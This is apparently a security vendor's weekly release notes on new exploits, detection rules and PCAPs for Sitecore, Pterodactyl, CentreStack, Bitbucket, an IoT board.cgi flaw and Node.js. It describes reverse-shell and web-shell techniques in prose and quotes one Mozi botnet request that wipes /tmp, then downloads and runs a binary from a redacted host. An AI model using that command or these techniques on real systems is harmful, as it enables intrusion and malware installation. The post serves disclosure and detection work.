Happy Friday! It’s been a busy week for the VulnCheck Initial Access team: we wrote coverage for six new vulnerabilities and cut a fresh release of go-exploit. VulnCheck will observe the July 4th holiday next Friday, so we’ll skip release notes next week and return to our regular schedule on July 11. Here’s a rundown of the team’s work from this week:
Sitecore, which is already represented in VulnCheck KEV with three CVEs, was recently handled by watchTowr. The Initial Access team developed an exploit for the first part of watchTowr's exploit chain, a hardcoded account. That sounds simple, but it's surprisingly complicated.
Our exploit authenticates with the hardcoded credential and accesses sensitive data to help validate successful exploitation. The team additionally developed a version scanner, Snort and Suricata rules, PCAPs, and search queries.
The team investigated a recently exploited vulnerability in Pterodactyl. Billed as pre-auth RCE, CVE-2025-49132 appeared at first to be a path traversal leading to arbitrary file disclosure. Further analysis revealed local file inclusion (LFI) in the Laravel PHP framework, a dependency for Pterodactyl. Leveraging pearcmd.php on the system, the team was able to reproduce RCE by writing PHP code to a file and then including the file.
With tens of thousands of potential targets online, we expect this new vulnerability to see increased exploitation very soon. Included in this release are an exploit with target validator, a packet capture of successful exploitation, Suricata and Snort signatures, and search queries for targets and signs of exploitation.
The team added an exploit for vulnerable versions of CentreStack, a cloud storage solution. This vulnerability has been reported as exploited in the wild by Huntress, CISA, and Gladinet.
The exploit we developed creates a serialized .NET object payload and then uses the known machineKey to sign the payload, allowing the server to trust it for deserialization. The default functionality of the exploit yields an asynchronous HTTP reverse shell executed via cscript on the target host. This functionality can be overridden using the -command flag to execute an arbitrary command such as cmd.exe /c <some command> on the application under the privileges of the CentreStack application. On our default install, this user was iis apppool\portal (which has SeImpersonatePrivilege).
The team also delivered unencrypted and encrypted PCAPs, search engine queries, and network rules.
This week, the team added coverage for a historical CISA KEV entry affecting Atlassian Bitbucket Server and Data Center. With hundreds of Bitbucket hosts still remaining online and at least one exploitation attempt within the last 90 days, this vulnerability still proves to be one that attackers will take a chance on.
The exploit, supporting both unauthenticated and authenticated exploitation, leverages a command injection vulnerability within Bitbucket's repository archive creation functionality to deploy a reverse shell on a vulnerable target. In addition to the exploit, coverage includes Snort and Suricata rules, a PCAP demonstrating the exploit at work, and search queries.
The VulnCheck CNA team recently assigned CVE-2025-34043 to a vulnerability that has been exploited in the wild since the days of IoT Reaper. Attackers are still actively targeting this vulnerability: our friends at GreyNoise have seen 9,000+ attempts over the last 90 days. DShield has also seen the Mozi botnet attempting to exploit this vulnerability as recently as yesterday (June 26). However, a quick analysis of the vulnerability shows the Mozi exploit shouldn't work as it doesn't contain any of the commands that trigger exploitation:
/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://redacted:37628/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
The VulnCheck team developed an exploit that drops a web shell on the target and bypasses both Emerging Threats signatures currently available. We also created a PCAP, Snort/Suricata rules, and search engine queries to support detection and hunting efforts. Perhaps surprisingly, we found vulnerable targets exposed on the internet. Despite its age, this remains a viable attack vector for adversaries.
At request, the team looked into this privilege escalation vulnerability in Node.js. This vulnerability has been reported to the Node.js team and was dismissed as informational and will not be fixed. As such, it appears to still be present in current releases. Node.js is a very popular web framework, and this vulnerability only requires Node to be installed.
This exploit works by sending a specially crafted message to an event pipe that Node.js creates and listens on. When the message has a handle pointer in the correct location, that handle is executed. The exploit includes a helper shell script that can be run on target to help calculate important offsets, improving the reliability and repeatability to run this exploit on different versions.
This week, the team started the process of adding native .NET serialized object generation into the open-sourced framework used to generate all of our exploits. This ongoing effort will add consistency and reliability to our exploits by reducing the use of pasted-in or modified binary blobs and will speed up development time. This will also give the security community at large another option for direct .NET serialized object payload integration into PoCs made using go-exploit or stand-alone PoCs written in Go.